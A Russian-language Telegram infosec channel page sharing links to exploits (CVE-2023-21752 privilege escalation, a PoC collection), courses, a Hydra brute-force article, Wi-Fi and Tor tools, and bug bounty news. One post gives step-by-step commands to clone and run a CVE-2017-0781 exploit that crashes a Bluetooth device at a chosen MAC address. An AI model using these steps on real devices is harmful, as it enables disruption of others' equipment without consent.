Путь до хакера | Cyber security
1.02K subscribers
71 photos
2 videos
17 files
139 links
Блог об информационной безопасности 👾

Всё, что тебе нужно, здесь: https://github.com/artroneee/Cyber-Security-Collection

По всем вопросам:
@artrone
@cherepawwka
Download Telegram
CVE-2023-21752 aka уязвимость удаления произвольного файла в службе резервного копирования Windows

Уязвимость, обнаруженная в службе резервного копирования Windows 10 января 2023 года, позволяет провести эскалацию привилегий user до system

Этот репозиторий содержит два эксплойта:

1. Удаление файла на выбор
2. Злоупотребление удалением произвольной формы, чтобы создать оболочку cmd с повышенными правами

Демонстрация уязвимости: https://github.com/Wh04m1001/CVE-2023-21752
Об уязвимости: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-21752
#CVE #полезные_материалы
К слову о полезных вещах:
Если кто не знал, то на Codeby есть 2 бесплатных курса, которые я настоятельно рекомендую вам пройти
Они короткие, но очень полезные
Бесплатный курс SQL Injection: https://codeby.school/training/view/besplatnyy-kurs-sql-injection
Бесплатный курс по пентесту: https://codeby.school/training/view/uroki-po-auditu-bezopasnosti-informacionnyh-sistem
#полезные_материалы #литература
В данной статье рассмотрим один из способов получения доступа к SSH с помощью Hydra, используя брутфорс по словарям👾
Читать: https://teletype.in/@hackerblog/HqfCdPABu-y
#полезные_материалы #литература
Что бы вы хотели увидеть на канале?🤓
Пишите в комментариях👇🏻
#новости
Общедоступная коллекция CVE и эксплойтов в студию🔥
Во вкладках с некоторыми эксплойтами есть how to use для самых маленьких😁
https://github.com/jhftss/POC
#CVE #полезные_материалы
👉Кладем Bluetooth-устройство через Termux с помощью эксплойта👈

Установка:
apt install python2.7 python-pip python-dev git libssl-dev libffi-dev build-essential
pip install —upgrade pip
pip install —upgrade pwntools
apt-get install bluetooth libbluetooth-dev
pip install pybluez

git clone https://github.com/ojasookert/CVE-2017-0781.git

Использование
(❗️нужен MAC адрес❗️):
btmgmt —index 0
find

python CVE-2017-0781.py TARGET= (МАC ADDRESS)

P.S. сам не тестил, поэтому за работоспособность ничего говорить не буду
#софт #termux
MDK4 - это инструмент тестирования Wi-Fi от E7mer из 360PegasusTeam, ASPj из k2wrlz, он использует библиотеку osdep library из проекта aircrack-ng для инъекции фреймов на нескольких операционных системах.
Более подробно: https://kali.tools/?p=4246
Github: https://github.com/aircrack-ng/mdk4
Кто попробует себя?)
👨‍💻 Багхантеры проверят Госуслуги на прочность

Минцифры запускает проект по поиску уязвимостей в Госуслугах и других ресурсах электронного правительства. Программа пройдёт в несколько этапов. На первом — независимые исследователи проверят портал Госуслуг и Единую систему идентификации и аутентификации (ЕСИА). На следующих этапах список ресурсов будет расширен, а условия — обновлены.

За успешную работу багхантеры могут получить до миллиона рублей. Программу спонсирует Ростелеком.

Вознаграждение зависит от степени уязвимости
🟦 низкая — подарки с символикой проекта
🟦 средняя — до 50 тыс. ₽
🟦 высокая — от 50 до 200 тыс. ₽
критическая — до 1 млн ₽ и благодарность от команды Минцифры

Тестирование доступно на платформах:
BI.ZONE
Positive Technologies

Чтобы принять участие в багбаунти, нужно:
1. Зарегистрироваться на выбранной платформе
2. Ознакомиться и согласиться с условиями программы
3. Найти уязвимость, не нарушая правил
4. Отправить информацию об уязвимости через платформу
5. Дождаться подтверждения уязвимости от Минцифры

Исследователи будут действовать по установленным правилам. Работа на платформе позволит определить логику потенциальных хакеров, эти данные будут использованы для дополнительной защиты информационных систем.

Принять участие в багбаунти

@mintsifry
Please open Telegram to view this post
VIEW IN TELEGRAM
Получен root тачки Interface📍
Райтап на днях😉
#новости #hack_the_box
SQLi для самых маленьких: простыми словами о не очень простых вещах🔥
Читать: https://teletype.in/@hackerblog/82Ovc3wHhmt
P.S. попытался максимально подробно разжевать. Напишите, нужно ли так делать или это лишнее?
#литература #полезные_материалы
Nipe — это движок, разработанный на Perl, целью которого является сделать сеть Tor вашим сетевым шлюзом по умолчанию.
Nipe может направлять трафик с вашего компьютера в Интернет через сеть Tor, поэтому вы можете путешествовать по Интернету, занимая более жесткую позицию в отношении конфиденциальности и анонимности в киберпространстве.

Установка:
git clone https://github.com/htrgouvea/nipe && cd nipe
cpanm --installdeps .
perl nipe.pl install (от рута)

Подробнее: https://github.com/htrgouvea/nipe
#софт
Мужики, с праздником вас 🤝
🔥Супер полезный репозиторий на GitHub'e🔥
Коллекция списков, руководств, шпаргалок, блогов, лайфхаков, однострочников, cli/веб-инструментов и многого другого😎

Подробнее: https://github.com/trimstray/the-book-of-secret-knowledge
#полезные_материалы #литература
Путь до хакера | Cyber security pinned «🔥Супер полезный репозиторий на GitHub'e🔥 Коллекция списков, руководств, шпаргалок, блогов, лайфхаков, однострочников, cli/веб-инструментов и многого другого😎 Подробнее: https://github.com/trimstray/the-book-of-secret-knowledge #полезные_материалы #литература»